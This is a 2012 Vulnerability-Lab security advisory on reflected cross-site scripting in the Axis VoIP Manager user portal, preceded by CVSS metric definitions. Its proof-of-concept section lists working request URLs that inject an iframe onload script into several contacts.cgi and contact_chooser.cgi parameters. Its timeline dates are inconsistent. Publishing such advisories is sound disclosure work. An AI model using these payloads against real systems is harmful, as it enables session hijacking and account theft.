The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity
Low
AC
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required
Low
PR
The attacker requires privileges that provide basic capabilities that are typically limited to settings and resources owned by a single low-privileged user. Alternatively, an attacker with Low privileges has the ability to access only non-sensitive resources.
User Interaction
None
UI
The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system a locally authenticated attacker executes code to elevate privileges
Scope
Unchanged
S
An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality
Low
C
There is some impact on confidentiality, but the attacker either does not gain control of any data, or the information obtained does not have a significant impact on the system or its operations.
Integrity
Low
I
Modification of data is possible, but the attacker does not have control over what can be modified, or the extent of what the attacker can affect is limited. The data modified does not have a direct, serious impact on the system.
Availability
Low
A
There is reduced performance or interruptions in resource availability. However, the attacker does not have the ability to completely prevent access to the resources or services; the impact is limited.
Title:
======
Axis VoIP Manager v2.1.5.7 - Multiple Web Vulnerabilities
Date:
=====
2012-09-09
References:
===========
http://www.vulnerability-lab.com/get_content.php?id=686
VL-ID:
=====
686
Common Vulnerability Scoring System:
====================================
2.3
Introduction:
=============
Feel free to create Schedules (in PBX Features), Inbound Routes, User Extensions (individually or using
Bulk Generator in Extensions & Directory), Feature Dial Codes (in PBX Features -> Feature Dial Codes),
IVR Menus (in PBX Features), ACD Queues, etc.
(Copy of the Vendor Homepage: http://www.axint.net/voip/ )
Abstract:
=========
The Vulnerability Laboratory Research Team discovered multiple cross site scripting vulnerabilities in the Axis VoIP
Manager v2.1.5.7.
Report-Timeline:
================
2011-09-07: Public Disclosure
Status:
========
Unpublished
Affected Products:
==================
Axis
Product: VoIP Manager v2.1.5.7
Exploitation-Technique:
=======================
Remote
Severity:
=========
Medium
Details:
========
Multiple non persistent cross site scripting vulnerabilities are detected in the Axis VoIP Manager User Portal v2.1.5.7.
The vulnerability allows an attackers (remote) to hijack website customer, moderator or admin sessions with medium or
high
required user inter action. The bugs are located on client side in the contact_chooser.cgi and contacts.cgi files with
the
bound vulnerable lastname, firstname, department, contact or manageg_usr application parameters. Successful
exploitation
result in application account steal, client side phishing & client-side content request manipulation. Exploitation
requires
medium or high user inter action & without privileged web application user account.
Vulnerable Module(s):
[+] contact_chooser.cgi
[+] contacts.cgi
Vulnerable Parameter(s):
[+] lastname, firstname & department
[+] contact
[+] managed_usr
Proof of Concept:
=================
The client side cross site scripting vulnerabilities can be exploited by remote attackers with medium or high required
user inter action and without privileged application user account. For demonstration or reproduce ...
Selection Filter
https://voip01.127.0.0.1:5999/asterisk/contacts.cgi?usr=demo-100&type=1&type_selector=2&lastname=&lastname_match=1&firstname=
&firstname_match=1&department=%22%3E%3Ciframe%20src=a%20onload=alert%28%22HI%22%29%20%3C&department_match=1&action=Select
https://voip01.127.0.0.1:5999/asterisk/contacts.cgi?usr=demo-100&type=1&type_selector=2&lastname=
&lastname_match=1&firstname=%22%3E%3Ciframe%20src=a%20onload=alert%28%22HI%22%29%20%3C&firstname_match=
1&department=&department_match=1&action=Select
https://voip01.127.0.0.1:5999/asterisk/contacts.cgi?usr=demo-100&type=1&type_selector=2&;
lastname=
%22%3E%3Ciframe%20src=a%20onload=alert%28%22HI%22%29%20%3C&lastname_match=1&firstname=&firstname_match=
1&department=&department_match=1&action=Select
Contact Chooser
https://voip01.127.0.0.1:5999/asterisk/contact_chooser.cgi?contact=%22%3E
%3Ciframe%20src=a%20onload=alert%28%22HI%22%29%20%3C
managed_usr - listing
https://voip01.127.0.0.1:5999/asterisk/contacts.cgi?type=2&usr=demo-100&managed_usr=%22%3E%3Ciframe%20src=
a%20onload=alert%28%22HI%22%29%20%3C&type_selector=2&lastname=&lastname_match=1&firstname=
&firstname_match=1&department=&department_match=1&action=Select+
Risk:
=====
The security risk of the non persistent (client side) cross site scripting vulnerabilities are estimated as
low(+)|(-)medium.
Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm () vulnerability-lab com)
Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all
warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose.
Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss
of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such
damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing
limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack
into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com -
www.vulnerability-lab.com/register
Contact: admin () vulnerability-lab com - support () vulnerability-lab com - research ()
vulnerability-lab com
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com -
news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab -
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php -
vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability
Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the
use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode,
videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record,
list (feed),
modify, use or edit our material contact (admin () vulnerability-lab com or support () vulnerability-lab com) to get a
permission.
Copyright 2012 | Vulnerability Laboratory
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum